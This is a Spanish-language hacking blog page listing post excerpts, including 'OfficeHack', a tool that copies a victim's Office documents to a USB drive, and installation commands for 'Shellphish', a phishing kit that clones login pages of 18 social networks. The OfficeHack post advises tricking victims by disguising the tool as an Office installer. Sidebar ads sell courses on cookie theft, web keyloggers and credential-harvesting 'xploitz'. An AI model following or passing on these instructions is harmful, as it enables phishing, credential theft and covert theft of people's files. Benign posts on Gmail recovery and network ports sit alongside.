Entradas

Mostrando entradas de febrero 4, 2019

㊜Suscribete!!! Quieres seguir este blog? Participa en el sitio

Selecciona tu idioma

OfficeHack extraer documentos de microsoft Office de la pc a una usb

Imagen
¿Qué es OfficeHack?
Es una aplicación OfficeHack roba documentos de microsoft Office hacia la USB . Toda clase de formatos de office Microsoft.
Tendrán que usar ing. social para poder ejecutar el programa en el ordenador de nuestra victima .

Puedes pasar el programa y decir que es un instalador de office la nueva versión .En caso de que tengas que presentar una tarea puedes decirle al maestro que son archivos que se creo al hacer tu informe


Microsoft Office es una suite ofimática que abarca el mercado completo en Internet e interrelaciona aplicaciones de escritorio, servidores y servicios para los sistemas operativos Microsoft Windows, Mac OS X, iOS y Android. La última versión de la suite ofimática es el Microsoft Office 2016.


A partir de la versión 2010, se ha mantenido un sistema de utilización mediante uso de pagos al programa, llamado Office 365. Esta versión se caracteriza por hacer uso de actualizaciones sin comprar de nuevo un software más reciente, además de ser inestable en m…

Instalar Framework Shellphish

Imagen
¿Qué es?
Herramienta de phishing para 18 redes sociales: Instagram, Facebook, Snapchat, Github, Twitter, Yahoo, Protonmail, Spotify, Netflix, Linkedin, WordPress, Origin, Steam, Microsoft, InstaFollowers, Gitlab, Pinterest.

Requisitos:

-Tener instalado termux (android +5)-Lo pueden usar desde un teléfono o emulador.
Características:
Este programa usa Ngrok y Serveo para crear un link con las paginas clonadas.
Pasos a seguir:

1.- pkg install git 2.- git clone https://github.com/Pericena/shellphish.git
3.- cd shellphish
4.- chmod +x shellphish.sh
5.- ./shellphish.sh
6.- pkg install php
7.- pkg install wget
8.- pkg install curl
9.- pkg install ssh
10.- pkg install SSH
11.- pkg install openssh
12.- ./shellphish
Opcional
pkg install url
pkg install serveo


Instalación
1.- pkg install git

2.- git clone https://github.com/Pericena/shellphish.git

3.- cd shellphish

4.- chmod +x shellphish.sh

5.- ./shellphish.sh

6.- pkg install php
pkg install wget
8.- pkg install curl
9.- pkg install ssh
10.- pkg install SSH
11.- pkg instal…

¿Cómo recuperar la cuenta de Gmail ?

Imagen
como podemos recuperar
 nuestra cuenta si tenemos  vinculado a nuestro celular en caso de que,hayamos pasado por un robo de celular podríamos dirigirnos a la oficina de servicios de celulares para recuperar nuestro numero celular y poder recuperar nuestra cuenta de gmail..
Cómo verificar que eres tú
Para ayudarte a proteger tu cuenta, es posible que se te solicite que compruebes tu identidad antes de realizar acciones sensibles como las siguientes:
Acceder desde un dispositivo nuevo
Ver las contraseñas guardadas
Cambiar la información de recuperación
Descargar tus datos
Nota: Es probable que veas este paso si notamos algo sospechoso, como el uso de un nuevo dispositivo o el acceso desde una ubicación diferente.
Cómo usar tu número
Para confirmar de forma rápida y segura que eres tú, deberás tener a mano un dispositivo móvil que esté registrado en tu cuenta. Puedes usar:
El teléfono con el número de teléfono de recuperación de tu cuenta

Nota: Si tienes una Cuenta de Google del trabajo, es…

DetectViruS seguridad en internet los puertos y comunicaciones

Imagen
¿QUÉ ES UN PUERTO?
Siempre que alguien me pide que explique qué es un puerto lo hago con un símil: imaginemos una casa; en una casa tenemos puertas y ventanas que solemos tener cerradas si no queremos que se nos cuelen ladrones. Ahora, imaginemos que en los bajos de nuestra casa tenemos una tienda. Necesitaremos, entonces, tener la puerta de la
calle abierta, para que entre gente y compre. Pues en informática, los puertos serían las ventanas y puertas nuestra casa, es decir, servicios que ofrecemos  y que normalmente utilizamos para comunicarnos, bien internamente (localhost) o bien externamente. En informática localhost, se refiere habitualmente a nuestra propia maquina o sistema, es decir, y aunque suene paradójico, localhost se refiere a la red formado por un solo equipo, el nuestro y es que el Sistema Operativo suele crear puertos que habilitan la comunicación de procesos entre sí exclusivos para nuestro propio equipo

La diferencia entre nuestra casa y nuestro ordenador, es que en…

MsImAOc ocultar archivos comprimido en una imagen

Imagen
Es una programa desarrollado en  Bat, que su función es ocultar archivos comprimido en una imagen ya sea cualquier extensión (png, gif, jpg, ico, etc.). Funciona para el sistema operativo Windows versión 7/10.
Debe tener instalado el programa WinRAR.Descargar nueva versión https://www.winrar.es/descargasCrear un archivo nuevo con la extensión ".rar" en la carpeta ArchivoImagLa imagen que desea ocultar la información debe estar guardada en la carpeta ArchivoImagLa imagen debe tener las extensión ".jpg, .png, .gif,...."
Pasos para usar la aplicación MsImAOc
Instalar WinRAR
https://www.winrar.es/descargasDescargar MsImAOc
Githubhttps://lpericena.blogspot.com/2018/11/MsImAOc.html


Paso 1
Introducir en el teclado “Windows + E “o dirigirse a una carpeta Este Equipo Clic a propiedades de sistema.

Paso 2
Clic a Configuración avanzada de sistema


Paso 3
Clic a Variable e entorno .


Paso 4
Dirigirse a PATH damos clic a la opción editar.


Paso 5
Nos dirigimos nuevamente a Este equ…

㊜Luishiño

★ ★ ★ ★ ★

>_

Hola soy ぎLuishiño y este es mi Blog personal..... 

Me considero un joven emprendedor,curioso,creativo,alegre y confiable,siempre buscando la manera de mejorar como amigo y persona . Estudio la carrera de ing. sistemas, aquí es donde me gusta escribir sobre temas que en su momento me interesan. Aveces sobre mi vida personal y principalmente cosas de programación, desarrollo web, Aplicaciones, Software, programas que yo mismo las desarrollo y cosas básicas de informática.

⚠ Nadie es como tú y ese es tú súper poder
¯\(°_o)/¯ Sigue mi blog :3

↪Sígueme en las redes sociales↩

Si tienes algún dudas, deja un comentario ¿Ha quedado contestada su pregunta? Comparte tu opinión :)

¡Bienvenido!

a la web de seguridad de la información The Seven Codes. Estimado Visitante, Te doy la más cordial bienvenida Atte:ぎLuishiño. Esperamos que encuentre la información que tú busca y que como resultado, me vea favorecido con su elección y preferencia. En este blog podrás encontrar muchas cosas de su utilidad, desde herramientas, manuales,comandos, artículos, tutoriales todo el contenido es totalmente gratuito hazta consejos los cuales ayudaran a seguir ampliando su conocimiento & siga aumentando tú pasión por la informática. ❯❯Más información

¯\(°_o)/¯ Sígueme en mi blog

YouTube

"Ataque de fuerza bruta Este método se trata de prueba y error, donde el atacante, provisto con algún software automatizado, puede probar miles de combinaciones posibles de diferentes caracteres y longitudes para tratar de abrir la autenticación del usuario, hasta que da con la contraseña correcta."

Mira este video y sorprendete

Tu y Las Redes Sociales

Tu y Las Redes Sociales

Publicada por Servicio Técnico "The Seven Codes " en Martes, 5 de diciembre de 2019

"Es tiempo que te preguntes, si eres libre y si te gusta como ellos te obligan a vivir."


Entradas populares de este blog

USB File Resc eliminar virus de accesos directos, recycler y otros malware de tus unidades usb

Vulnerabilidad en facebook hackear con xploitz parte II

Sockberus Autentificación de proxys

¿Qué es un xploitz? Vulnerabilidad en facebook hackear parte I

Programa Revealer Keylogger Pro

By Blog

By Luishiño

Security Hacking

Especialista en seguridad informática

Ofertas y Descuentos

Libros

by @Luishiño! Publicado en enero 14, 2020

Curso Javascript Hacking | Phishing

Javascript es un lenguaje que se puede utilizar para hacer ataques xss , robo de cookies , keylogger web y muchas otras cosas mas , pero también se puede con este mismo lenguaje evadir esas vulnerabilidades .

$1

Libros

by @Luishiño! Publicado en enero 25, 2020

Hacking Course Social Networks

Los “Xploits” consisten en que la víctima recibe una postal falsa en su correo electrónico que contiene el link de una web falsa que le pide digitar los datos de su E-mail y su contraseña .

$5



Únete al chat